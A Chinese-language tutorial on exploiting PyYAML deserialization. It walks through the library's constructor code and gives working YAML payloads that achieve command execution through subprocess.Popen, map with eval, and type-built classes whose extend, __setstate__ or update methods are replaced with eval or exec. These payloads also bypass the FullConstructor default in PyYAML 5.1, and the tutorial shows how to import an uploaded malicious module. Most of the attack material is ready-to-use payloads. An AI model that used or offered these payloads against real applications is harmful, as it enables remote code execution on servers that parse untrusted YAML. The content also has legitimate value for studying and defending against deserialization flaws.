python/object/new 对应的 construct_python_object_new 只有一行代码,调用了construct_python_object_apply
1 2 def  construct_python_object_new (self, suffix, node ):     return  self .construct_python_object_apply(suffix, node, newobj=True )
 
唯一不同的是newobj参数不一样,这个参数影响了 make_python_instance 中的一个判断
1 2 3 4 if  newobj and  isinstance (cls, type ):     return  cls.__new__(cls, *args, **kwds)else :     return  cls(*args, **kwds)
 
基本不影响,所以 python/object/new 和 python/object/apply 可以看作是同一个
python/object 1 2 3 4 5 6 7 8 def  construct_python_object (self, suffix, node ):               instance = self .make_python_instance(suffix, node, newobj=True )     yield  instance     deep = hasattr (instance, '__setstate__' )     state = self .construct_mapping(node, deep=deep)     self .set_python_instance_state(instance, state)
 
执行 make_python_instance 时并没有传 args 或 kwds 参数,所以只能执行无参函数
例如
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 import  yamlclass  User :     def  __init__ (self ):         self .name = ""  payload1 = """!!python/object:__main__.User name: aaa """  payload2 = "!!python/object:__main__.User {name: aaa}"  data1 = yaml.load(payload1)print (data1.name) data2 = yaml.load(payload2)print (data2.name)''' aaa aaa ''' 
 
python/module 代码中只调用了 find_python_module 来导入模块
1 2 3 4 5 6 def  construct_python_module (self, suffix, node ):     value = self .construct_scalar(node)     if  value:         raise  ConstructorError("while constructing a Python module" , node.start_mark,                 "expected the empty value, but found %r"  % value, node.start_mark)     return  self .find_python_module(suffix, node.start_mark)
 
虽然 construct_python_module 没有调用逻辑,但是与任意文件上传搭配有奇效
比如在upload目录下上传了恶意文件exp.py
就可以用!!python/module:upload.exp来导入
1 2 3 4 5 6 7 8 import  yaml yaml.load('!!python/module:upload.exp' )''' root ''' 
 
一个小技巧: 当文件名是 __init__.py 时,直接导入目录名即可,可以绕过.的限制
python/name 代码逻辑与 python/module 非常相似,不过module只返回模块,而name返回模块下的属性和方法
1 2 3 4 5 6 def  construct_python_name (self, suffix, node ):     value = self .construct_scalar(node)     if  value:         raise  ConstructorError("while constructing a Python name" , node.start_mark,                 "expected the empty value, but found %r"  % value, node.start_mark)     return  self .find_python_name(suffix, node.start_mark)
 
这个特性常用在获取未知变量的值上
1 2 3 4 5 6 7 8 9 10 import  yaml key = "k1y....."  config = '!!python/name:__main__.key' print (yaml.load(config))''' k1y..... ''' 
 
PyYAML >= 5.1 新增的 1:FullConstructor:默认的构造器。 2:UnsafeConstructor:支持全部的强制类型转换 3:Constructor:等同于 UnsafeConstructor
1 2 3 4 5 6 7 8 __all__ = [     'BaseConstructor' ,     'SafeConstructor' ,     'FullConstructor' ,     'UnsafeConstructor' ,     'Constructor' ,     'ConstructorError'  ]
 
如果指定的构造器是 UnsafeConstructor 或者 Constructor ,那么直接用<5.1的方法打就好了
1 2 3 4 5 6 yaml.unsafe_load(exp) yaml.unsafe_load_all(exp) yaml.load(exp, Loader=Loader) yaml.load(exp, Loader=UnsafeLoader) yaml.load_all(exp, Loader=Loader) yaml.load_all(exp, Loader=UnsafeLoader)
 
默认构造器下的利用方式 这里以 PyYAML==5.1 为例子
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 def  make_python_instance (self, suffix, node,         args=None , kwds=None , newobj=False , unsafe=False  ):     if  not  args:         args = []     if  not  kwds:         kwds = {}     cls = self .find_python_name(suffix, node.start_mark)     if  not  (unsafe or  isinstance (cls, type )):         raise  ConstructorError("while constructing a Python instance" , node.start_mark,                 "expected a class, but found %r"  % type (cls),                 node.start_mark)     if  newobj and  isinstance (cls, type ):         return  cls.__new__(cls, *args, **kwds)     else :         return  cls(*args, **kwds)def  find_python_name (self, name, mark, unsafe=False  ):     if  not  name:         raise  ConstructorError("while constructing a Python object" , mark,                 "expected non-empty name appended to the tag" , mark)     if  '.'  in  name:         module_name, object_name = name.rsplit('.' , 1 )     else :         module_name = 'builtins'          object_name = name     if  unsafe:         try :             __import__ (module_name)         except  ImportError as  exc:             raise  ConstructorError("while constructing a Python object" , mark,                     "cannot find module %r (%s)"  % (module_name, exc), mark)     if  not  module_name in  sys.modules:         raise  ConstructorError("while constructing a Python object" , mark,                 "module %r is not imported"  % module_name, mark)     module = sys.modules[module_name]     if  not  hasattr (module, object_name):         raise  ConstructorError("while constructing a Python object" , mark,                 "cannot find %r in the module %r"                  % (object_name, module.__name__), mark)     return  getattr (module, object_name)
 
可以看到引入了 unsafe ,并且有如下的规则
1 2 3 4 5 if  not  (unsafe or  isinstance (cls, type ))if  not  module_name in  sys.modules
 
方法一: 
最简单的方式就是遍历 sys.modules 字典,找一个满足条件的模块中能执行命令的类
比如 subprocess.Popen
1 yaml.load("!!python/object/apply:subprocess.Popen [whoami]" )
 
方法二: 
借助 map 来触发函数执行
例如map(eval, ["__import__('os').system('whoami')"])
需要注意在python2中会直接返回结果,但是在python3中返回的就是一个map对象,需要用一些函数来遍历
 
1 2 3 4 5 6 list (map (eval , ["__import__('os').system('whoami')" ]))set (map (eval , ["__import__('os').system('whoami')" ]))tuple (map (eval , ["__import__('os').system('whoami')" ]))frozenset (map (eval , ["__import__('os').system('whoami')" ]))bytes (map (eval , ["__import__('os').system('whoami')" ]))
 
转换成yaml格式
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 import  yaml yaml.load(""" !!python/object/new:map   - !!python/name:eval   - ["__import__('os').system('whoami')"] """ ) yaml.load(""" !!python/object/new:tuple - !!python/object/new:map   - !!python/name:eval   - ["__import__('os').system('whoami')"] """ ) yaml.load(""" !!python/object/new:frozenset - !!python/object/new:map   - !!python/name:eval   - ["__import__('os').system('whoami')"] """ ) yaml.full_load(""" !!python/object/new:bytes - !!python/object/new:map   - !!python/name:eval   - ["__import__('os').system('whoami')"] """ )
 
这里存在一个问题,在使用!!python/object/new的情况下只能使用 tuple,bytes 等函数来遍历map对象,用 list 或者 set 都不行(当然在 !!python/object/apply 下没有问题)
这是因为上文提到的 python/object/new 与 python/object/apply 的不同之处导致的
当调用 construct_python_object_apply 时会使 newobj 为 true,那么条件就成立了,就会调用 cls.__new__(cls, *args, **kwds)
1 2 3 4 if  newobj and  isinstance (cls, type ):     return  cls.__new__(cls, *args, **kwds)else :     return  cls(*args, **kwds)
 
因为这几个函数的底层实现并不相同,所以部分函数不能使用 __new__ 来传值
其他方法: 
继续看 !!python/object/new 的代码,可以发现除了调用 make_python_instance 外还有三个判断,这三个判断在之前的payload中并没有使用,因为并没有传对应的值
1 2 3 4 5 6 7 if  state:     self .set_python_instance_state(instance, state)if  listitems:     instance.extend(listitems)if  dictitems:     for  key in  dictitems:         instance[key] = dictitems[key]
 
首先是当 listitems 存在,就会触发 instance 下的 extend 方法。那么我们可以创建一个类,在类中添加一个名为 extend 的方法,然后重写成 eval,就相当于 instance.eval(listitems)
1 2 3  a = type ("rce" , (), {"extend" : eval }) a.extend("__import__('os').system('whoami')" )
 
转成YAML
1 2 3 4 5 6 7 8 yaml.full_load(""" !!python/object/new:type args:   - rce   - !!python/tuple []   - {"extend": !!python/name:eval } listitems: "__import__('os').system('whoami')" """ )
 
state 的利用方式也是同样的,通过修改 __setstate__ 达到执行函数的目的(与pickle中的利用__setstate__执行命令类似)
1 2 3 4 5 6 7 8 9 10 11 12 13 def  set_python_instance_state (self, instance, state ):     if  hasattr (instance, '__setstate__' ):         instance.__setstate__(state)     else :         slotstate = {}         if  isinstance (state, tuple ) and  len (state) == 2 :             state, slotstate = state         if  hasattr (instance, '__dict__' ):             instance.__dict__.update(state)         elif  state:             slotstate.update(state)         for  key, value in  slotstate.items():             setattr (object , key, value)
 
1 2 a = type ("rce" , (), {"__setstate__" : eval }) a.__setstate__("__import__('os').system('whoami')" )
 
转为YAML
1 2 3 4 5 6 7 8 yaml.full_load(""" !!python/object/new:type args:   - rce   - !!python/tuple []   - {"__setstate__": !!python/name:eval } state: "__import__('os').system('whoami')" """ )
 
总结:有能调用实例方法的地方,那么就可以构造一个实例,用恶意函数去替换,来执行我们的代码 
比如 set_python_instance_state 下的 slotstate.update(state) 也可以rce
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 yaml.full_load(""" !!python/object/new:type   args: []   state: !!python/tuple     - "__import__('os').system('whoami')"     - !!python/object/new:type       args:         - exp         - !!python/tuple []         - {"update": !!python/name:exec , "items": !!python/name:list } """ ) yaml.full_load(""" !!python/object/new:str     args: []     state: !!python/tuple       - "__import__('os').system('whoami')"       - !!python/object/new:staticmethod         args: []         state:           update: !!python/name:eval           items: !!python/name:list """ )
 
参考文章:SecMap - 反序列化(Python) python反序列化详解 Python pickle反序列化浅析 Pickle反序列化 SecMap - 反序列化(PyYAML)